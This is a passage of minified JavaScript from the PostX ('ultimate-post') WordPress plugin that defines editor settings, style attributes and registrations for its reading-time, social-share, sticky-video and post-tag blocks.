.ultp-sticky-video.ultp-sticky-active"}]},stickyRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { border-radius:{{stickyRadius}}; }"}]},stickyPadding:{type:"object",default:{lg:{}},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { padding:{{stickyPadding}} !important; }"}]},stickyCloseSize:{type:"string",default:"47",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active .ultp-sticky-close { height:{{stickyCloseSize}}px; width:{{stickyCloseSize}}px; } {{ULTP}} .ultp-sticky-video.ultp-sticky-active .ultp-sticky-close::after { font-size: calc({{stickyCloseSize}}px / 2);}"}]},stickyCloseColor:{type:"string",default:"#fff",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active .ultp-sticky-close { color:{{stickyCloseColor}} }"}]},stickyCloseBg:{type:"string",default:" rgb(43, 43, 43)",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-close { background-color:{{stickyCloseBg}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},28913:(e,t,l)=>{"use strict";var o=l(67294),a=l(8790),i=l(10577),n=l(96283);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/featured_img.svg",alt:"Post Feature Image"}),attributes:i.Z,edit:a.Z,save:()=>null})},45454:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,readLabelText:v,readIconStyle:h,readLabel:f,readIconShow:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:d,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(d,"ultimate-post/post-reading-time",y);const T=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"toggle",key:"readLabel",label:__("Enable Label","ultimate-post")}},{data:{type:"color",key:"readColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"readTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"readCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}},{data:{type:"text",key:"readLabelText",label:__("Text","ultimate-post")}},{data:{type:"group",key:"readLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"readIconShow",initialOpen:!0,include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"readIconStyle",label:__("Style","ultimate-post")}},{data:{type:"range",key:"readIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"readSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-read-count"},k&&h&&a.ZP[h],(0,o.createElement)("div",null,"12"),f&&(0,o.createElement)("span",{className:"ultp-read-label"},v)))))}},62698:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},readLabel:{type:"boolean",default:!0},readIconShow:{type:"boolean",default:!0},readColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-read-count { color:{{readColor}} }"}]},readTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-read-count"}]},readCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{readCountAlign}};}"}]},readLabelText:{type:"string",default:"Reading Time",style:[{depends:[{key:"readLabel",condition:"==",value:!0}]}]},readLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"readLabelAlign",condition:"==",value:"before"},{key:"readLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count .ultp-read-label {order: -1; margin-right: 5px;}"},{depends:[{key:"readLabelAlign",condition:"==",value:"after"},{key:"readLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count .ultp-read-label {order: unset; margin-left: 5px;}"}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"readIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count > svg { color:{{iconColor}}; color:{{iconColor}};}"}]},readIconStyle:{type:"string",default:"readingTime1",style:[{depends:[{key:"readIconShow",condition:"==",value:!0}]}]},readIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"readIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count svg{ width:{{readIconSize}}; height:{{readIconSize}} }"}]},readSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"readIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count > svg { margin-right: {{readSpace}} }"},{depends:[{key:"readIconShow",condition:"==",value:!0},{key:"readLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-read-count > svg { margin: {{readSpace}} } {{ULTP}}  .ultp-read-count .ultp-read-label {margin: 0px !important;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},64255:(e,t,l)=>{"use strict";var o=l(67294),a=l(45454),i=l(62698),n=l(46693);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/reading_time.svg",alt:"Post Reading Time"}),attributes:i.Z,edit:a.Z,save:()=>null})},50730:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(64766),s=l(45092);const{__}=wp.i18n,{Fragment:p}=wp.element,{InspectorControls:c,useBlockProps:u}=wp.blockEditor;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,disInline:v,shareLabelShow:h,shareCountLabel:f,shareCountShow:k,repetableField:w,shareLabelStyle:x,currentPostId:T}}=e,_={setAttributes:t,name:l,attributes:d,clientId:m};(0,n.S)({blockId:y,clientId:m,currentPostId:T,setAttributes:t,checkRef:!1}),y&&(0,i.Kh)(d,"ultimate-post/post-social-share",y);const C=u({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(p,null,(0,o.createElement)(c,null,(0,o.createElement)(s.Z,{store:_}),(0,a.dH)()),(0,o.createElement)("div",C,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-post-share"},(0,o.createElement)("div",{className:`ultp-post-share-layout ultp-inline-${v}`},h&&(0,o.createElement)("div",{className:"ultp-post-share-count-section ultp-post-share-count-section-"+x},"style2"!=x&&k&&(0,o.createElement)("span",{className:"ultp-post-share-count"},"350"),"style2"==x&&(0,o.createElement)("span",{className:"ultp-post-share-icon-section"},r.ZP.share),"style2"!=x&&f&&(0,o.createElement)("span",{className:"ultp-post-share-label"},f)),(0,o.createElement)("div",{className:"ultp-post-share-item-inner-block"},w.map(((e,t)=>(0,o.createElement)("div",{key:t,className:`ultp-post-share-item ultp-repeat-${t} ultp-social-${e.type}`},(0,o.createElement)("a",{href:"#",className:`ultp-post-share-item-${e.type}`},(0,o.createElement)("span",{className:"ultp-post-share-item-icon"},r.ZP[e.type]),e.enableLabel&&(0,o.createElement)("span",{className:"ultp-post-share-item-label"},e.label)))))))))))}},45092:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Setting","ultimate-post")},(0,o.createElement)(a.T,{title:__("General","ultimate-post"),store:e,initialOpen:!0,include:[{position:1,data:{type:"repetable",key:"repetableField",label:__("Social Share Style","ultimate-post"),fields:[{type:"select",key:"type",label:__("Social Media","ultimate-post"),options:[{value:"facebook",label:__("Facebook","ultimate-post")},{value:"twitter",label:__("Twitter","ultimate-post")},{value:"messenger",label:__("Messenger","ultimate-post")},{value:"linkedin",label:__("Linkedin","ultimate-post")},{value:"reddit",label:__("Reddit","ultimate-post")},{value:"mail",label:__("Mail","ultimate-post")},{value:"whatsapp",label:__("WhatsApp","ultimate-post")},{value:"skype",label:__("Skype","ultimate-post")},{value:"pinterest",label:__("Pinterest","ultimate-post")}]},{type:"toggle",key:"enableLabel",label:__("Label Enable","ultimate-post")},{type:"text",key:"label",label:__("Label","ultimate-post")},{type:"color",key:"iconColor",label:__("Color","ultimate-post")},{type:"color",key:"iconColorHover",label:__("Color Hover","ultimate-post")},{type:"color",key:"shareBg",label:__("Background","ultimate-post")},{type:"color",key:"shareBgHover",label:__("Hover Background","ultimate-post")}]}},{position:2,data:{type:"separator",label:__("Common Style","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"shareColor",label:__("Color","ultimate-post")},{type:"color",key:"shareCommonBg",label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"shareHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"shareHoverBg",label:__("Hover Background","ultimate-post")}]}]}},{position:3,data:{type:"typography",key:"shareItemTypo",label:__("Typography","ultimate-post")}}]}),(0,o.createElement)(a.T,{title:__("Item Setting","ultimate-post"),include:[{data:{type:"toggle",key:"disInline",label:__("Item Inline","ultimate-post")}},{data:{type:"range",key:"shareIconSize",min:0,max:150,unit:!1,responsive:!0,step:1,label:__("Icon Size","ultimate-post")}},{data:{type:"border",key:"shareBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"shareRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"itemPadding",min:0,max:80,step:1,unit:!0,responsive:!0,label:__("Item Padding","ultimate-post")}},{data:{type:"dimension",key:"itemSpacing",min:0,max:80,step:1,unit:!0,responsive:!0,label:__("Spacing","ultimate-post")}},{data:{type:"group",key:"itemContentAlign",options:[{label:"Left",value:"flex-start"},{label:"Center",value:"center"},{label:"Right",value:"flex-end"}],justify:!0,label:__("Content Alignment","ultimate-post")}},{data:{type:"alignment",key:"itemAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}}],store:e}),(0,o.createElement)(a.T,{title:__("Share Label & Count","ultimate-post"),include:[{data:{type:"toggle",key:"shareLabelShow",label:__("Show Share label & Count","ultimate-post")}},{data:{type:"select",key:"shareLabelStyle",label:__("Share Label Style","ultimate-post"),options:[{value:"style1",label:__("Style 1","ultimate-post")},{value:"style2",label:__("Style 2","ultimate-post")},{value:"style3",label:__("Style 3","ultimate-post")},{value:"style4",label:__("Style 4","ultimate-post")}]}},{data:{type:"range",key:"labelIconSize",min:0,max:100,unit:!1,responsive:!0,step:1,label:__("Label Icon Size","ultimate-post")}},{data:{type:"dimension",key:"labelIconSpace",label:__("Space","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"color",key:"shareLabelIconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"color",key:"Labels1BorderColor",label:__("Border Color","ultimate-post")}},{data:{type:"color",key:"shareLabelBackground",label:__("Background Color","ultimate-post")}},{data:{type:"border",key:"shareLabelBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"shareLabelRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"shareLabelPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"toggle",key:"shareCountShow",label:__("Share Count","ultimate-post")}},{data:{type:"color",key:"shareCountColor",label:__("Count Color","ultimate-post")}},{data:{type:"typography",key:"shareCountTypo",label:__("Count Typography","ultimate-post")}},{data:{type:"text",key:"shareCountLabel",label:__("Share Count Label","ultimate-post")}},{data:{type:"color",key:"shareLabelColor",label:__("Label Color","ultimate-post")}},{data:{type:"typography",key:"shareLabelTypo",label:__("Label Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Sticky Position","ultimate-post"),depend:"enableSticky",include:[{data:{type:"select",key:"itemPosition",label:__("Display Style","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("right","ultimate-post")},{value:"bottom",label:__("bottom","ultimate-post")}]}},{data:{type:"range",key:"stickyLeftOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Left Offset","ultimate-post")}},{data:{type:"range",key:"stickyRightOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Right Offset","ultimate-post")}},{data:{type:"range",key:"stickyTopOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Top Offset","ultimate-post")}},{data:{type:"range",key:"stickyBottomOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Bottom Offset","ultimate-post")}},{data:{type:"toggle",key:"resStickyPost",label:__("Disable Sticky ( Responsive )","ultimate-post")}},{data:{type:"range",key:"floatingResponsive",min:0,max:1200,unit:!1,responsive:!1,step:1,label:__("Horizontal floating responsiveness","ultimate-post")}},{data:{type:"toggle",key:"stopSticky",label:__("Disable Sticky ( when footer is visible )","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))},69977:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},shareColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item-icon svg { color:{{shareColor}}; }\n      {{ULTP}}  .ultp-post-share-item-label { color:{{shareColor}} }"}]},shareCommonBg:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item a { background-color: {{shareCommonBg}}; }"}]},shareHoverColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item:hover .ultp-post-share-item-icon svg { color:{{shareHoverColor}}; }\n        {{ULTP}} .ultp-post-share-item:hover .ultp-post-share-item-label{ color:{{shareHoverColor}} }"}]},shareHoverBg:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item a:hover { background-color:{{shareHoverBg}}; } "}]},repetableField:{type:"array",fields:{type:{type:"string",default:"facebook"},enableLabel:{type:"boolean",default:!0},label:{type:"string",default:"Share"},iconColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item a .ultp-post-share-item-icon svg { color:{{iconColor}} !important; }\n              {{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item .ultp-post-share-item-label { color:{{iconColor}} }"}]},iconColorHover:{type:"string",default:"#d2d2d2",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item:hover .ultp-post-share-item-icon svg { color:{{iconColorHover}} !important; }\n              {{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item:hover .ultp-post-share-item-label{ color:{{iconColorHover}} }"}]},shareBg:{type:"string",default:"#7a49ff",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item a { background-color: {{shareBg}}; }"}]},shareBgHover:{type:"object",default:"#7a49ff",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item a:hover { background-color:{{shareBgHover}}; }"}]}},default:[{type:"facebook",enableLabel:!0,label:"Facebook",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#4267B2",bgHoverColor:"#f5f5f5"},{type:"twitter",enableLabel:!0,label:"Twitter",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#1DA1F2",bgHoverColor:"#f5f5f5"},{type:"pinterest",enableLabel:!0,label:"Pinterest",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#E60023",bgHoverColor:"#f5f5f5"},{type:"linkedin",enableLabel:!0,label:"Linkedin",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#0A66C2",bgHoverColor:"#f5f5f5"},{type:"mail",enableLabel:!0,label:"Mail",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#EA4335",bgHoverColor:"#f5f5f5"}]},disInline:{type:"boolean",default:!0},shareItemTypo:{type:"object",default:{openTypography:1,size:{lg:"18",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} .ultp-post-share-item a .ultp-post-share-item-label"}]},shareIconSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-share-item .ultp-post-share-item-icon svg { height:{{shareIconSize}} !important; width:{{shareIconSize}} !important;}"}]},shareBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#c3c3c3",type:"solid"},style:[{selector:"{{ULTP}} .ultp-post-share-item a"}]},shareRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-share-item a { border-radius:{{shareRadius}}; }"}]},itemPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"15",right:"15",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-share-item-inner-block .ultp-post-share-item a { padding:{{itemPadding}} !important; }"}]},itemSpacing:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-share-item-inner-block .ultp-post-share-item {margin:{{itemSpacing}} !important; }"}]},itemContentAlign:{type:"string",default:"flex-start",style:[{depends:[{key:"disInline",condition:"==",value:!0},{key:"enableSticky",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-post-share-layout {display: flex; align-items: center; justify-content:{{itemContentAlign}}; width: 100%;} "},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-post-share-layout {display: flex; justify-content: center; align-items:{{itemContentAlign}}; width: 100%;} "}]},itemAlign:{type:"string",default:"left",style:[{depends:[{key:"disInline",condition:"==",value:!1},{key:"enableSticky",condition:"==",value:!1},{key:"itemAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-post-share { text-align:{{itemAlign}}; } .rtl\n        {{ULTP}} .ultp-post-share { text-align: right !important; }"},{depends:[{key:"disInline",condition:"==",value:!1},{key:"enableSticky",condition:"==",value:!1},{key:"itemAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-post-share { text-align:{{itemAlign}}; } .rtl\n        {{ULTP}} .ultp-post-share { text-align: left !important;}"},{depends:[{key:"disInline",condition:"==",value:!1},{key:"enableSticky",condition:"==",value:!1},{key:"itemAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-post-share { text-align:{{itemAlign}}; }"}]},shareLabelShow:{type:"boolean",default:!0},labelIconSize:{type:"object",default:{lg:"24"},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-icon-section svg { height: {{labelIconSize}}px; width: {{labelIconSize}}px; }"}]},labelIconSpace:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"15",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-share-count-section { margin:{{labelIconSpace}} }"}]},shareLabelIconColor:{type:"string",default:"#002dff",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-post-share-icon-section svg{ color:{{shareLabelIconColor}}; }"}]},shareLabelStyle:{type:"string",default:"style1",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-post-share-layout{display: flex; align-items:center;}"},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-post-share-layout{display: flex; align-items:center;}"},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout{display: flex; flex-direction: column}"},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-post-share-layout{display: flex}"}]},shareCountShow:{type:"boolean",default:!0,style:[{depends:[{key:"shareLabelStyle",condition:"==",value:"style1"},{key:"shareLabelShow",condition:"==",value:!0}]},{depends:[{key:"shareLabelStyle",condition:"==",value:"style3"},{key:"shareLabelShow",condition:"==",value:!0}]},{depends:[{key:"shareLabelStyle",condition:"==",value:"style4"},{key:"shareLabelShow",condition:"==",value:!0}]}]},Labels1BorderColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-post-share-count-section-style1,\n          {{ULTP}} .ultp-post-share-count-section-style1:after {border-color:{{Labels1BorderColor}} !important; }"}]},shareCountColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"shareLabelStyle",condition:"==",value:"style1"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count {color:{{shareCountColor}} !important; }"},{depends:[{key:"shareLabelStyle",condition:"==",value:"style3"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count {color:{{shareCountColor}} !important; }"}]},shareCountTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"shareLabelStyle",condition:"==",value:"style1"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count"},{depends:[{key:"shareLabelStyle",condition:"==",value:"style3"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count"}]},shareCountLabel:{type:"string",default:"Shares",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"!=",value:"style2"}]}]},shareLabelColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"shareLabelStyle",condition:"!=",value:"style2"},{key:"shareCountLabel",condition:"!=",value:""},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section .ultp-post-share-label {color:{{shareLabelColor}}; }"}]},shareLabelTypo:{type:"object",default:{openTypography:0,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"shareLabelStyle",condition:"!=",value:"style2"},{key:"shareCountLabel",condition:"!=",value:""},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-label"}]},shareLabelBackground:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section,\n          {{ULTP}} .ultp-post-share-count-section-style1::after {background-color:{{shareLabelBackground}}; }"}]},shareLabelBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#c3c3c3",type:"solid"},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"!=",value:"style1"}],selector:"{{ULTP}} .ultp-post-share-count-section,\n          {{ULTP}} .ultp-post-share-count-section-style1::after"}]},shareLabelRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section { border-radius:{{shareLabelRadius}}; }"}]},shareLabelPadding:{type:"object",default:{lg:{top:"10",bottom:"10",left:"25",right:"25",unit:"px"}},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section { padding:{{shareLabelPadding}}; }"}]},enableSticky:{type:"boolean",default:!1,style:[{depends:[{key:"enableSticky",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-post-share-layout {display: flex; align-items:center;}"}]},itemPosition:{type:"string",default:"bottom",style:[{depends:[{key:"enableSticky",condition:"==",value:!0}]}]},stickyLeftOffset:{type:"string",default:"20",style:[{depends:[{key:"enableSticky",condition:"==",value:!0},{key:"itemPosition",condition:"!=",value:"right"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed;left:{{stickyLeftOffset}}px;}"}]},stickyRightOffset:{type:"string",default:"20",style:[{depends:[{key:"enableSticky",condition:"==",value:!0},{key:"itemPosition",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed; right:{{stickyRightOffset}}px;}"}]},stickyTopOffset:{type:"string",default:"20",style:[{depends:[{key:"enableSticky",condition:"==",value:!0},{key:"itemPosition",condition:"!=",value:"bottom"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed;top:{{stickyTopOffset}}px;z-index:9999999;}"}]},stickyBottomOffset:{type:"string",default:"20",style:[{depends:[{key:"itemPosition",condition:"==",value:"bottom"},{key:"enableSticky",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed;bottom:{{stickyBottomOffset}}px; z-index:9999999;}"}]},resStickyPost:{type:"boolean",default:!1,style:[{depends:[{key:"enableSticky",condition:"==",value:!0}]}]},floatingResponsive:{type:"string",default:"600",style:[{depends:[{key:"resStickyPost",condition:"==",value:!0}],selector:"@media only screen and (max-width: {{floatingResponsive}}px) { .ultp-post-share-layout { position: unset !important; display: flex !important; justify-content: center; } .ultp-post-share-item-inner-block { display: flex !important; } .ultp-post-share-count-section-style1:after { bottom: auto !important; transform: rotate(44deg) !important; top: 40% !important; right: -8px !important; }} "}]},stopSticky:{type:"boolean",default:!1,style:[{depends:[{key:"enableSticky",condition:"==",value:!0}]}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},88111:(e,t,l)=>{"use strict";var o=l(67294),a=l(50730),i=l(69977),n=l(14980);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/share.svg",alt:"Post Share"}),attributes:i.Z,edit:a.Z,save:()=>null})},62358:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,tagLabel:v,tagLabelShow:h,tagIconShow:f,tagIconStyle:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:d,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(d,"ultimate-post/post-tag",y);const T=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",initialOpen:!0,include:[{data:{type:"alignment",key:"tagAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"tagColor",label:__("Color","ultimate-post")},{type:"color",key:"tagBgColor",label:__("Background","ultimate-post")},{type:"border",key:"tagItemBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"tagRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"tagHovColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"tagBgHovColor",label:__("Hover Background","ultimate-post")},{type:"border",key:"tagItemHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"tagHoverRadius",label:__("Hover 